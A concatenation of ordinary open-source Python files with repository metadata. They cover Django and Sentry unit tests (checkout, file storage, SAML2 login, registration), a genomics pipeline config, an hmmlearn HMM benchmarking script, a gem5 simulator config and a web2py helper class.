def test_checkout_version_with_from_storage(storage_data, expected_storage):
checkout = Checkout.from_storage(
storage_data, Mock(), AnonymousUser(), 'tracking_code')
storage = checkout.for_storage()
assert storage == expected_storage
def test_checkout_clear_storage():
checkout = Checkout(Mock(), AnonymousUser(), 'tracking_code')
checkout.storage['new'] = 1
checkout.clear_storage()
assert checkout.storage is None
assert checkout.modified is True
def test_checkout_is_shipping_required():
cart = Mock(is_shipping_required=Mock(return_value=True))
checkout = Checkout(cart, AnonymousUser(), 'tracking_code')
assert checkout.is_shipping_required is True
def test_checkout_deliveries():
partition = Mock(
get_total=Mock(return_value=Price(10, currency=settings.DEFAULT_CURRENCY)),
get_price_per_item=Mock(return_value=Price(10, currency=settings.DEFAULT_CURRENCY)))
def f():
yield partition
partition.__iter__ = Mock(return_value=f())
cart = Mock(partition=Mock(return_value=[partition]),
currency=settings.DEFAULT_CURRENCY)
checkout = Checkout(
cart, AnonymousUser(), 'tracking_code')
deliveries = list(checkout.deliveries)
assert deliveries[0][1] == Price(0, currency=settings.DEFAULT_CURRENCY)
assert deliveries[0][2] == partition.get_total()
assert deliveries[0][0][0][0] == partition
def test_checkout_deliveries_with_shipping_method(monkeypatch):
shipping_cost = 5
items_cost = 5
partition = Mock(
is_shipping_required=MagicMock(return_value=True),
get_total=Mock(return_value=Price(items_cost, currency=settings.DEFAULT_CURRENCY)),
get_price_per_item=Mock(return_value=Price(items_cost, currency=settings.DEFAULT_CURRENCY)))
def f():
yield partition
partition.__iter__ = Mock(return_value=f())
cart = Mock(partition=Mock(return_value=[partition]),
currency=settings.DEFAULT_CURRENCY)
shipping_method_mock = Mock(get_total=Mock(return_value=Price(shipping_cost, currency=settings.DEFAULT_CURRENCY)))
monkeypatch.setattr(Checkout, 'shipping_method', shipping_method_mock)
checkout = Checkout(
cart, AnonymousUser(), 'tracking_code')
deliveries = list(checkout.deliveries)
assert deliveries[0][1] == Price(shipping_cost, currency=settings.DEFAULT_CURRENCY)
assert deliveries[0][2] == Price(items_cost + shipping_cost, currency=settings.DEFAULT_CURRENCY)
assert deliveries[0][0][0][0] == partition
@pytest.mark.parametrize('user, shipping', [
(Mock(default_shipping_address='user_shipping'), 'user_shipping'),
(AnonymousUser(), None),
])
def test_checkout_shipping_address_with_anonymous_user(user, shipping):
checkout = Checkout(Mock(), user, 'tracking_code')
assert checkout.shipping_address == shipping
@pytest.mark.parametrize('address_objects, shipping', [
(Mock(get=Mock(return_value='shipping')), 'shipping'),
(Mock(get=Mock(side_effect=Address.DoesNotExist)), None),
])
def test_checkout_shipping_address_with_storage(address_objects, shipping, monkeypatch):
monkeypatch.setattr('saleor.checkout.core.Address.objects', address_objects)
checkout = Checkout(Mock(), AnonymousUser(), 'tracking_code')
checkout.storage['shipping_address'] = {'id': 1}
assert checkout.shipping_address == shipping
def test_checkout_shipping_address_setter():
address = Address(first_name='Jan', last_name='Kowalski')
checkout = Checkout(Mock(), AnonymousUser(), 'tracking_code')
checkout.shipping_address = address
assert checkout.storage['shipping_address'] == {
'city': u'', 'city_area': u'', 'company_name': u'', 'country': '', 'phone': u'',
'country_area': u'', 'first_name': 'Jan', 'id': None, 'last_name': 'Kowalski',
'postal_code': u'', 'street_address_1': u'', 'street_address_2': u''}
@pytest.mark.parametrize('shipping_address, shipping_method, value', [
(Mock(country=Mock(code='PL')),
Mock(country_code='PL', __eq__=lambda n, o: n.country_code == o.country_code),
Mock(country_code='PL')),
(Mock(country=Mock(code='DE')), Mock(country_code='PL'), None),
(None, Mock(country_code='PL'), None),
])
def test_checkout_shipping_method(shipping_address, shipping_method, value, monkeypatch):
queryset = Mock(get=Mock(return_value=shipping_method))
monkeypatch.setattr(Checkout, 'shipping_address', shipping_address)
monkeypatch.setattr('saleor.checkout.core.ShippingMethodCountry.objects', queryset)
checkout = Checkout(Mock(), AnonymousUser(), 'tracking_code')
checkout.storage['shipping_method_country_id'] = 1
assert checkout.shipping_method == value
def test_checkout_shipping_does_not_exists(monkeypatch):
queryset = Mock(get=Mock(side_effect=ShippingMethodCountry.DoesNotExist))
monkeypatch.setattr('saleor.checkout.core.ShippingMethodCountry.objects', queryset)
checkout = Checkout(Mock(), AnonymousUser(), 'tracking_code')
checkout.storage['shipping_method_country_id'] = 1
assert checkout.shipping_method is None
def test_checkout_shipping_method_setter():
shipping_method = Mock(id=1)
checkout = Checkout(Mock(), AnonymousUser(), 'tracking_code')
assert checkout.modified is False
checkout.shipping_method = shipping_method
assert checkout.modified is True
assert checkout.storage['shipping_method_country_id'] == 1
@pytest.mark.parametrize('user, address', [
(AnonymousUser(), None),
(Mock(default_billing_address='billing_address',
addresses=Mock(is_authenticated=Mock(return_value=True))), 'billing_address'),
])
def test_checkout_billing_address(user, address):
checkout = Checkout(Mock(), user, 'tracking_code')
assert checkout.billing_address == address
@pytest.mark.parametrize('cart, status_code, url', [
(Mock(__len__=Mock(return_value=0)), 302, '/cart/'),
(Mock(__len__=Mock(return_value=1),
is_shipping_required=Mock(return_value=True)),
302, '/checkout/shipping-address/'),
(Mock(__len__=Mock(return_value=1),
is_shipping_required=Mock(return_value=False)),
302, '/checkout/summary/'),
(Mock(__len__=Mock(return_value=0),
is_shipping_required=Mock(return_value=False)), 302, '/cart/'),
])
def test_index_view(cart, status_code, url, rf):
checkout = Checkout(cart, AnonymousUser(), 'tracking_code')
request = rf.get('checkout:index')
request.user = checkout.user
request.session = {STORAGE_SESSION_KEY: checkout.for_storage()}
request.discounts = []
response = views.index_view(request, checkout, checkout.cart)
assert response.status_code == status_code
assert response.url == url
|
rodrigozn/CW-Shop
|
tests/test_checkout.py
|
Python
|
bsd-3-clause
| 7,657
|
from __future__ import absolute_import
from django.core.files.base import ContentFile
from sentry.models import File, FileBlob
from sentry.testutils import TestCase
class FileBlobTest(TestCase):
def test_from_file(self):
fileobj = ContentFile("foo bar")
my_file1 = FileBlob.from_file(fileobj)
assert my_file1.path
my_file2 = FileBlob.from_file(fileobj)
# deep check
assert my_file1.id == my_file2.id
assert my_file1.checksum == my_file2.checksum
assert my_file1.path == my_file2.path
class FileTest(TestCase):
def test_file_handling(self):
fileobj = ContentFile("foo bar")
file1 = File.objects.create(
name='baz.js',
type='default',
size=7,
)
results = file1.putfile(fileobj, 3)
assert len(results) == 3
assert results[0].offset == 0
assert results[1].offset == 3
assert results[2].offset == 6
fp = None
with file1.getfile() as fp:
assert fp.read() == 'foo bar'
fp.seek(2)
fp.tell() == 2
assert fp.read() == 'o bar'
fp.seek(0)
fp.tell() == 0
assert fp.read() == 'foo bar'
fp.seek(4)
fp.tell() == 4
assert fp.read() == 'bar'
fp.seek(1000)
fp.tell() == 1000
with self.assertRaises(IOError):
fp.seek(-1)
with self.assertRaises(ValueError):
fp.seek(0)
with self.assertRaises(ValueError):
fp.tell()
with self.assertRaises(ValueError):
fp.read()
|
mitsuhiko/sentry
|
tests/sentry/models/test_file.py
|
Python
|
bsd-3-clause
| 1,674
|
from django.test import TestCase
from django.urls import reverse
from .utils import add_default_data
from petition.models import PytitionUser, Permission, Organization, Petition
class DelSlugViewTest(TestCase):
"""Test del_slug view"""
@classmethod
def setUpTestData(cls):
add_default_data()
def login(self, name, password=None):
self.client.login(username=name, password=password if password else name)
self.pu = PytitionUser.objects.get(user__username=name)
return self.pu
def logout(self):
self.client.logout()
def test_DelSlugViewOk(self):
john = self.login("john")
john_perms = Permission.objects.get(organization__slugname="attac", user=john)
john_perms.can_modify_petitions = True
john_perms.save()
petition = Petition.objects.filter(org__slugname="attac").first()
slug = petition.slugmodel_set.first()
response = self.client.get(reverse("del_slug", kwargs={'petition_id': petition.id})+"?slugid="+str(slug.id),
follow=True)
self.assertRedirects(response, reverse("edit_petition", args=[petition.id]) + "#tab_social_network_form")
|
fallen/Pytition
|
pytition/petition/tests/tests_DelSlugView.py
|
Python
|
bsd-3-clause
| 1,208
|
from django.views.generic import ListView, DetailView
from django.core.exceptions import ObjectDoesNotExist
from competition.models.competition_model import Competition
class CompetitionListView(ListView):
"""Lists every single competition"""
context_object_name = 'competitions'
model = Competition
template_name = 'competition/competition/competition_list.html'
paginate_by = 10
class CompetitionDetailView(DetailView):
"""Shows details about a particular competition"""
context_object_name = 'competition'
model = Competition
slug_url_kwarg = 'comp_slug'
template_name = 'competition/competition/competition_detail.html'
def get_context_data(self, **kwargs):
context = super(CompetitionDetailView, self).get_context_data(**kwargs)
competition = self.object
user = self.request.user
context['user_registered'] = competition.is_user_registered(user)
context['user_team'] = None
try:
if not user.is_anonymous():
context['user_team'] = competition.team_set.get(members=user.pk)
except ObjectDoesNotExist:
pass
return context
|
michaelwisely/django-competition
|
src/competition/views/competition_views.py
|
Python
|
bsd-3-clause
| 1,178
|
## Absolute location where all raw files are
RAWDATA_DIR = '/home/cmb-06/as/skchoudh/dna/Oct_10_2016_HuR_Human_Mouse_Liver/rna-seq/Penalva_L_08182016/human'
## Output directory
OUT_DIR = '/staging/as/skchoudh/Oct_10_2016_HuR_Human_Mouse_Liver/RNA-Seq_human'
## Absolute location to 're-ribo/scripts' directory
SRC_DIR = '/home/cmb-panasas2/skchoudh/github_projects/re-ribo/scripts'
## Genome fasta location
GENOME_FASTA = '/home/cmb-panasas2/skchoudh/genomes/hg38/fasta/hg38.fa'
## Chromosome sizes location
CHROM_SIZES = '/home/cmb-panasas2/skchoudh/genomes/hg38/fasta/hg38.chrom.sizes'
## Path to STAR index (will be generated if does not exist)
STAR_INDEX = '/home/cmb-panasas2/skchoudh/genomes/hg38/star_annotated'
## GTF path
GTF = '/home/cmb-panasas2/skchoudh/genomes/hg38/annotation/gencode.v25.annotation.without_rRNA_tRNA.gtf'
## GenePred bed downloaded from UCSC
## (this is used for inferring the type of experiment i.e stranded/non-stranded
## and hence is not required)
GENE_BED = '/home/cmb-panasas2/skchoudh/genomes/hg38/annotation/gencode.v24.genes.bed'
## Path to bed file with start codon coordinates
START_CODON_BED = '/home/cmb-panasas2/skchoudh/genomes/hg38/annotation/gencode.v25.gffutils.start_codon.bed'
## Path to bed file with stop codon coordinates
STOP_CODON_BED = '/home/cmb-panasas2/skchoudh/genomes/hg38/annotation/gencode.v25.gffutils.stop_codon.bed'
## Path to bed file containing CDS coordinates
CDS_BED = '/home/cmb-panasas2/skchoudh/genomes/hg38/annotation/gencode.v25.gffutils.cds.bed'
# We don't have these so just use CDs bed to get the pipeline running
UTR5_BED = '/home/cmb-panasas2/skchoudh/genomes/hg38/annotation/gencode.v25.gffutils.UTR5.bed'
UTR3_BED = '/home/cmb-panasas2/skchoudh/genomes/hg38/annotation/gencode.v25.gffutils.UTR3.bed'
## Name of python2 environment
## The following package needs to be installed in that environment
## numpy scipy matploltib seaborn pysam pybedtools htseq
## you can do: conda create -n python2 PYTHON=2 && source activate python2 && conda install numpy scipy matploltib seaborn pysam pybedtools htseq
PYTHON2ENV = 'python2'
############################################Do Not Edit#############################################
HTSEQ_STRANDED = 'yes'
FEATURECOUNTS_S = '-s 1'
FEATURECOUNTS_T = 'CDS'
HTSEQ_MODE = 'intersection-strict'
|
saketkc/ribo-seq-snakemake
|
configs/Oct_10_2016_HuR_Human_rna.py
|
Python
|
bsd-3-clause
| 2,343
|
"""
Tests for django-registration's built-in views.
"""
from django.core.urlresolvers import reverse
from django.test import override_settings, TestCase
from ..models import RegistrationProfile
@override_settings(ROOT_URLCONF='registration.tests.urls')
class ActivationViewTests(TestCase):
"""
Tests for aspects of the activation view not currently exercised
by any built-in workflow.
"""
@override_settings(ACCOUNT_ACTIVATION_DAYS=7)
def test_activation(self):
"""
Activation of an account functions properly when using a
simple string URL as the success redirect.
"""
data = {
'username': 'bob',
'email': 'bob@example.com',
'password1': 'secret',
'password2': 'secret'
}
resp = self.client.post(
reverse('registration_register'),
data=data
)
profile = RegistrationProfile.objects.get(
user__username=data['username']
)
resp = self.client.get(
reverse(
'registration_activate',
args=(),
kwargs={'activation_key': profile.activation_key}
)
)
self.assertRedirects(resp, '/')
|
tdruez/django-registration
|
registration/tests/test_views.py
|
Python
|
bsd-3-clause
| 1,271
|
from __future__ import absolute_import
import six
import pytest
import base64
from sentry.utils.compat import mock
from exam import fixture
from six.moves.urllib.parse import urlencode, urlparse, parse_qs
from django.conf import settings
from django.core.urlresolvers import reverse
from django.db import models
from sentry.auth.authenticators import TotpInterface
from sentry.auth.providers.saml2.provider import SAML2Provider, Attributes, HAS_SAML2
from sentry.models import (
AuditLogEntry,
AuditLogEntryEvent,
AuthProvider,
Organization,
)
from sentry.testutils import AuthProviderTestCase
from sentry.testutils.helpers import Feature
from sentry.utils.compat import map
dummy_provider_config = {
"idp": {
"entity_id": "https://example.com/saml/metadata/1234",
"x509cert": "foo_x509_cert",
"sso_url": "http://example.com/sso_url",
"slo_url": "http://example.com/slo_url",
},
"attribute_mapping": {
Attributes.IDENTIFIER: "user_id",
Attributes.USER_EMAIL: "email",
Attributes.FIRST_NAME: "first_name",
Attributes.LAST_NAME: "last_name",
},
}
class DummySAML2Provider(SAML2Provider):
def get_saml_setup_pipeline(self):
return []
def build_config(self, state):
return dummy_provider_config
@pytest.mark.skipif(not HAS_SAML2, reason="SAML2 library is not installed")
class AuthSAML2Test(AuthProviderTestCase):
provider = DummySAML2Provider
provider_name = "saml2_dummy"
def setUp(self):
self.user = self.create_user("rick@onehundredyears.com")
self.org = self.create_organization(owner=self.user, name="saml2-org")
# enable require 2FA and enroll user
TotpInterface().enroll(self.user)
self.org.update(flags=models.F("flags").bitor(Organization.flags.require_2fa))
assert self.org.flags.require_2fa.is_set
self.auth_provider = AuthProvider.objects.create(
provider=self.provider_name, config=dummy_provider_config, organization=self.org
)
# The system.url-prefix, which is used to generate absolute URLs, must
# have a TLD for the SAML2 library to consider the URL generated for
# the ACS endpoint valid.
self.url_prefix = settings.SENTRY_OPTIONS.get("system.url-prefix")
settings.SENTRY_OPTIONS.update({"system.url-prefix": "http://testserver.com"})
super(AuthSAML2Test, self).setUp()
def tearDown(self):
# restore url-prefix config
settings.SENTRY_OPTIONS.update({"system.url-prefix": self.url_prefix})
super(AuthSAML2Test, self).tearDown()
@fixture
def login_path(self):
return reverse("sentry-auth-organization", args=["saml2-org"])
@fixture
def acs_path(self):
return reverse("sentry-auth-organization-saml-acs", args=["saml2-org"])
@fixture
def setup_path(self):
return reverse("sentry-organization-auth-provider-settings", args=["saml2-org"])
def test_redirects_to_idp(self):
resp = self.client.post(self.login_path, {"init": True})
assert resp.status_code == 302
redirect = urlparse(resp.get("Location", ""))
query = parse_qs(redirect.query)
assert redirect.path == "/sso_url"
assert "SAMLRequest" in query
def accept_auth(self, **kargs):
saml_response = self.load_fixture("saml2_auth_response.xml")
saml_response = base64.b64encode(saml_response).decode("utf-8")
# Disable validation of the SAML2 mock response
is_valid = "onelogin.saml2.response.OneLogin_Saml2_Response.is_valid"
with mock.patch(is_valid, return_value=True):
return self.client.post(self.acs_path, {"SAMLResponse": saml_response}, **kargs)
def test_auth_sp_initiated(self):
# Start auth process from SP side
self.client.post(self.login_path, {"init": True})
auth = self.accept_auth()
assert auth.status_code == 200
assert auth.context["existing_user"] == self.user
def test_auth_idp_initiated(self):
auth = self.accept_auth()
assert auth.status_code == 200
assert auth.context["existing_user"] == self.user
@mock.patch("sentry.auth.helper.logger")
def test_auth_setup(self, auth_log):
self.auth_provider.delete()
self.login_as(self.user)
data = {"init": True, "provider": self.provider_name}
with Feature(["organizations:sso-basic", "organizations:sso-saml2"]):
setup = self.client.post(self.setup_path, data)
assert setup.status_code == 302
redirect = urlparse(setup.get("Location", ""))
assert redirect.path == "/sso_url"
auth = self.accept_auth(follow=True)
messages = map(lambda m: six.text_type(m), auth.context["messages"])
assert len(messages) == 2
assert messages[0] == "You have successfully linked your account to your SSO provider."
assert messages[1].startswith("SSO has been configured for your organization")
# require 2FA disabled when saml is enabled
org = Organization.objects.get(id=self.org.id)
assert not org.flags.require_2fa.is_set
event = AuditLogEntry.objects.get(
target_object=org.id, event=AuditLogEntryEvent.ORG_EDIT, actor=self.user
)
assert "require_2fa to False when enabling SSO" in event.get_note()
auth_log.info.assert_called_once_with(
"Require 2fa disabled during sso setup", extra={"organization_id": self.org.id}
)
def test_auth_idp_initiated_no_provider(self):
self.auth_provider.delete()
auth = self.accept_auth(follow=True)
assert auth.status_code == 200
messages = map(lambda m: six.text_type(m), auth.context["messages"])
assert len(messages) == 1
assert messages[0] == "The organization does not exist or does not have SAML SSO enabled."
def test_saml_metadata(self):
path = reverse("sentry-auth-organization-saml-metadata", args=["saml2-org"])
resp = self.client.get(path)
assert resp.status_code == 200
assert resp.get("content-type") == "text/xml"
def test_logout_request(self):
saml_request = self.load_fixture("saml2_slo_request.xml")
saml_request = base64.b64encode(saml_request)
self.login_as(self.user)
path = reverse("sentry-auth-organization-saml-sls", args=["saml2-org"])
path = path + "?" + urlencode({"SAMLRequest": saml_request})
resp = self.client.get(path)
assert resp.status_code == 302
redirect = urlparse(resp.get("Location", ""))
query = parse_qs(redirect.query)
assert redirect.path == "/slo_url"
assert "SAMLResponse" in query
updated = type(self.user).objects.get(pk=self.user.id)
assert updated.session_nonce != self.user.session_nonce
|
beeftornado/sentry
|
tests/sentry/web/frontend/test_auth_saml2.py
|
Python
|
bsd-3-clause
| 6,945
|
"""
A script for testing / benchmarking HMM Implementations
"""
import argparse
import collections
import logging
import time
import hmmlearn.hmm
import numpy as np
import sklearn.base
LOG = logging.getLogger(__file__)
class Benchmark:
def __init__(self, repeat, n_iter, verbose):
self.repeat = repeat
self.n_iter = n_iter
self.verbose = verbose
def benchmark(self, sequences, lengths, model, tag):
elapsed = []
for i in range(self.repeat):
start = time.time()
cloned = sklearn.base.clone(model)
cloned.fit(sequences, lengths)
end = time.time()
elapsed.append(end-start)
self.log_one_run(start, end, cloned, tag)
return np.asarray(elapsed)
def generate_training_sequences(self):
pass
def new_model(self, implementation):
pass
def run(self, results_file):
runtimes = collections.defaultdict(dict)
sequences, lengths = self.generate_training_sequences()
for implementation in ["scaling", "log"]:
model = self.new_model(implementation)
LOG.info(f"{model.__class__.__name__}: testing {implementation}")
key = f"{model.__class__.__name__}|EM|hmmlearn-{implementation}"
elapsed = self.benchmark(sequences, lengths, model, key)
runtimes[key]["mean"] = elapsed.mean()
runtimes[key]["std"] = elapsed.std()
with open(results_file, mode="w") as fd:
fd.write("configuration,mean,std,n_iterations,repeat\n")
for key, value in runtimes.items():
fd.write(f"{key},{value['mean']},{value['std']},"
f"{self.n_iter},{self.repeat}\n")
def log_one_run(self, start, end, model, tag):
LOG.info(f"Training Took {end-start} seconds {tag}")
LOG.info(f"startprob={model.startprob_}")
LOG.info(f"transmat={model.transmat_}")
class GaussianBenchmark(Benchmark):
def new_model(self, implementation):
return hmmlearn.hmm.GaussianHMM(
n_components=4,
n_iter=self.n_iter,
covariance_type="full",
implementation=implementation,
verbose=self.verbose
)
def generate_training_sequences(self):
sampler = hmmlearn.hmm.GaussianHMM(
n_components=4,
covariance_type="full",
init_params="",
verbose=self.verbose
)
sampler.startprob_ = np.asarray([0, 0, 0, 1])
sampler.transmat_ = np.asarray([
[.2, .2, .3, .3],
[.3, .2, .2, .3],
[.2, .3, .3, .2],
[.3, .3, .2, .2],
])
sampler.means_ = np.asarray([
-1.5,
0,
1.5,
3
]).reshape(4, 1)
sampler.covars_ = np.asarray([
.5,
.5,
.5,
.5
]).reshape(4, 1, 1,)
sequences, states = sampler.sample(50000)
lengths = [len(sequences)]
return sequences, lengths
def log_one_run(self, start, end, model, tag):
super().log_one_run(start, end, model, tag)
LOG.info(f"means={model.means_}")
LOG.info(f"covars={model.covars_}")
class MultinomialBenchmark(Benchmark):
def new_model(self, implementation):
return hmmlearn.hmm.MultinomialHMM(
n_components=3,
n_iter=self.n_iter,
verbose=self.verbose,
implementation=implementation
)
def generate_training_sequences(self):
sampler = hmmlearn.hmm.MultinomialHMM(n_components=3)
sampler.startprob_ = np.array([0.6, 0.3, 0.1])
sampler.transmat_ = np.array([[0.6, 0.2, 0.2],
[0.3, 0.5, 0.2],
[0.4, 0.3, 0.3]])
sampler.emissionprob_ = np.array([
[.1, .5, .1, .3],
[.1, .2, .4, .3],
[0, .5, .5, .0],
])
sequences, states = sampler.sample(50000)
lengths = [len(sequences)]
return sequences, lengths
def log_one_run(self, start, end, model, tag):
super().log_one_run(start, end, model, tag)
LOG.info(f"emissions={model.emissionprob_}")
class MultivariateGaussianBenchmark(GaussianBenchmark):
def generate_training_sequences(self):
sampler = hmmlearn.hmm.GaussianHMM(
n_components=4,
covariance_type="full",
init_params=""
)
sampler.startprob_ = np.asarray([0, 0, 0, 1])
sampler.transmat_ = np.asarray([
[.2, .2, .3, .3],
[.3, .2, .2, .3],
[.2, .3, .3, .2],
[.3, .3, .2, .2],
])
sampler.means_ = np.asarray([
[-1.5, 0],
[0, 0],
[1.5, 0],
[3, 0]
])
sampler.covars_ = np.asarray([
[[.5, 0],
[0, .5]],
[[.5, 0],
[0, 0.5]],
[[.5, 0],
[0, .5]],
[[0.5, 0],
[0, 0.5]],
])
observed, hidden = sampler.sample(50000)
lengths = [len(observed)]
return observed, lengths
class GMMBenchmark(GaussianBenchmark):
def generate_training_sequences(self):
sampler = hmmlearn.hmm.GMMHMM(
n_components=4,
n_mix=3,
covariance_type="full",
init_params=""
)
sampler.startprob_ = [.25, .25, .25, .25]
sampler.transmat_ = [
[.1, .3, .3, .3],
[.3, .1, .3, .3],
[.3, .3, .1, .3],
[.3, .3, .3, .1],
]
sampler.weights_ = [
[.2, .2, .6],
[.6, .2, .2],
[.2, .6, .2],
[.1, .1, .8],
]
sampler.means_ = np.asarray([
[[-10], [-12], [-9]],
[[-5], [-4], [-3]],
[[-1.5], [0], [1.5]],
[[5], [7], [9]],
])
sampler.covars_ = np.asarray([
[[[.125]], [[.125]], [[.125]]],
[[[.125]], [[.125]], [[.125]]],
[[[.125]], [[.125]], [[.125]]],
[[[.125]], [[.125]], [[.125]]],
])
n_sequences = 10
length = 5_000
sequences = []
for i in range(n_sequences):
sequences.append(sampler.sample(5000)[0])
return np.concatenate(sequences), [length] * n_sequences
def new_model(self, implementation):
return hmmlearn.hmm.GMMHMM(
n_components=4,
n_mix=3,
n_iter=self.n_iter,
covariance_type="full",
verbose=self.verbose,
implementation=implementation
)
def log_one_run(self, start, end, model, tag):
super().log_one_run(start, end, model, tag)
LOG.info(f"weights_={model.weights_}")
def main():
parser = argparse.ArgumentParser()
parser.add_argument("--all", action="store_true")
parser.add_argument("--categorical", action="store_true")
parser.add_argument("--gaussian", action="store_true")
parser.add_argument("--multivariate-gaussian", action="store_true")
parser.add_argument("--gaussian-mixture", action="store_true")
parser.add_argument("--repeat", type=int, default=10)
parser.add_argument("--verbose", action="store_true")
parser.add_argument("--n-iter", type=int, default=100)
args = parser.parse_args()
if args.all:
args.categorical = True
args.gaussian = True
args.multivariate_gaussian = True
args.gaussian_mixture = True
if args.categorical:
bench = MultinomialBenchmark(
repeat=args.repeat,
n_iter=args.n_iter,
verbose=args.verbose,
)
bench.run("categorical.benchmark.csv")
if args.gaussian:
bench = GaussianBenchmark(
repeat=args.repeat,
n_iter=args.n_iter,
verbose=args.verbose,
)
bench.run("gaussian.benchmark.csv")
if args.multivariate_gaussian:
bench = MultivariateGaussianBenchmark(
repeat=args.repeat,
n_iter=args.n_iter,
verbose=args.verbose,
)
bench.run("multivariate_gaussian.benchmark.csv")
if args.gaussian_mixture:
bench = GMMBenchmark(
repeat=args.repeat,
n_iter=args.n_iter,
verbose=args.verbose,
)
bench.run("gmm.benchmark.csv")
if __name__ == "__main__":
logging.basicConfig(
format='%(asctime)s - %(name)s - %(levelname)s - %(message)s',
level=logging.DEBUG
)
main()
|
hmmlearn/hmmlearn
|
scripts/benchmark.py
|
Python
|
bsd-3-clause
| 8,715
|
# Copyright (c) 2006-2007 The Regents of The University of Michigan
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met: redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer;
# redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution;
# neither the name of the copyright holders nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# Authors: Steve Reinhardt
import m5
from m5.objects import *
m5.util.addToPath('../configs/common')
import FSConfig
# --------------------
# Base L1 Cache
# ====================
class L1(BaseCache):
hit_latency = '1ns'
response_latency = '1ns'
block_size = 64
mshrs = 4
tgts_per_mshr = 8
is_top_level = True
# ----------------------
# Base L2 Cache
# ----------------------
class L2(BaseCache):
block_size = 64
hit_latency = '10ns'
response_latency = '10ns'
mshrs = 92
tgts_per_mshr = 16
write_buffers = 8
# ---------------------
# I/O Cache
# ---------------------
class IOCache(BaseCache):
assoc = 8
block_size = 64
hit_latency = '50ns'
response_latency = '50ns'
mshrs = 20
size = '1kB'
tgts_per_mshr = 12
addr_ranges = [AddrRange(0, size='8GB')]
forward_snoops = False
is_top_level = True
#cpu
cpus = [ TimingSimpleCPU(cpu_id=i) for i in xrange(2) ]
#the system
system = FSConfig.makeLinuxAlphaSystem('timing')
system.iocache = IOCache()
system.iocache.cpu_side = system.iobus.master
system.iocache.mem_side = system.membus.slave
system.cpu = cpus
#create the l1/l2 bus
system.toL2Bus = CoherentBus()
#connect up the l2 cache
system.l2c = L2(size='4MB', assoc=8)
system.l2c.cpu_side = system.toL2Bus.master
system.l2c.mem_side = system.membus.slave
#connect up the cpu and l1s
for c in cpus:
c.addPrivateSplitL1Caches(L1(size = '32kB', assoc = 1),
L1(size = '32kB', assoc = 4))
# create the interrupt controller
c.createInterruptController()
# connect cpu level-1 caches to shared level-2 cache
c.connectAllPorts(system.toL2Bus, system.membus)
c.clock = '2GHz'
root = Root(full_system=True, system=system)
m5.ticks.setGlobalFrequency('1THz')
|
lastweek/gem5
|
tests/configs/tsunami-simple-timing-dual.py
|
Python
|
bsd-3-clause
| 3,357
|
#!/usr/bin/env python
import os
import json
class TermiteCore:
def __init__( self, request, response ):
self.request = request
self.response = response
def GetConfigs( self ):
def GetServer():
return self.request.env['HTTP_HOST']
def GetDataset():
return self.request.application
def GetModel():
return self.request.controller
def GetAttribute():
return self.request.function
def GetDatasets( dataset ):
FOLDER_EXCLUSIONS = frozenset( [ 'admin', 'examples', 'welcome', 'init' ] )
applications_parent = self.request.env['applications_parent']
applications_path = '{}/applications'.format( applications_parent )
folders = []
for folder in os.listdir( applications_path ):
applications_subpath = '{}/{}'.format( applications_path, folder )
if os.path.isdir( applications_subpath ):
if folder not in FOLDER_EXCLUSIONS:
folders.append( folder )
folders = sorted( folders )
return folders
def GetModels( dataset, model ):
if dataset == 'init':
return None
app_data_path = '{}/data'.format( self.request.folder )
folders = []
for folder in os.listdir( app_data_path ):
app_data_subpath = '{}/{}'.format( app_data_path, folder )
if os.path.isdir( app_data_subpath ):
folders.append( folder )
folders = sorted( folders )
return folders
def GetAttributes( dataset, model, attribute ):
if dataset == 'init':
return None
if model == 'default':
return None
if model == 'lda':
return [
'DocIndex',
'TermIndex',
'TopicIndex',
'TermTopicMatrix',
'DocTopicMatrix',
'TopicCooccurrence'
]
elif model == 'corpus':
return [
'DocMeta',
'TermFreqs',
'TermCoFreqs'
]
else:
return []
server = GetServer()
dataset = GetDataset()
datasets = GetDatasets( dataset )
model = GetModel()
models = GetModels( dataset, model )
attribute = GetAttribute()
attributes = GetAttributes( dataset, model, attribute )
configs = {
'server' : server,
'dataset' : dataset,
'datasets' : datasets,
'model' : model,
'models' : models,
'attribute' : attribute,
'attributes' : attributes
}
return configs
def IsDebugMode( self ):
return 'debug' in self.request.vars
def IsJsonFormat( self ):
return 'format' in self.request.vars and 'json' == self.request.vars['format'].lower()
def GenerateResponse( self, params = {}, keysAndValues = {} ):
if self.IsDebugMode():
return self.GenerateDebugResponse()
else:
return self.GenerateNormalResponse( params, keysAndValues )
def GenerateDebugResponse( self ):
def GetEnv( env ):
data = {}
for key in env:
value = env[key]
if isinstance( value, dict ) or \
isinstance( value, list ) or isinstance( value, tuple ) or \
isinstance( value, str ) or isinstance( value, unicode ) or \
isinstance( value, int ) or isinstance( value, long ) or isinstance( value, float ) or \
value is None or value is True or value is False:
data[ key ] = value
else:
data[ key ] = 'N/A'
return data
info = {
'env' : GetEnv( self.request.env ),
'cookies' : self.request.cookies,
'vars' : self.request.vars,
'get_vars' : self.request.get_vars,
'post_vars' : self.request.post_vars,
'folder' : self.request.folder,
'application' : self.request.application,
'controller' : self.request.controller,
'function' : self.request.function,
'args' : self.request.args,
'extension' : self.request.extension,
'now' : str( self.request.now )
}
return json.dumps( info, encoding = 'utf-8', indent = 2, sort_keys = True )
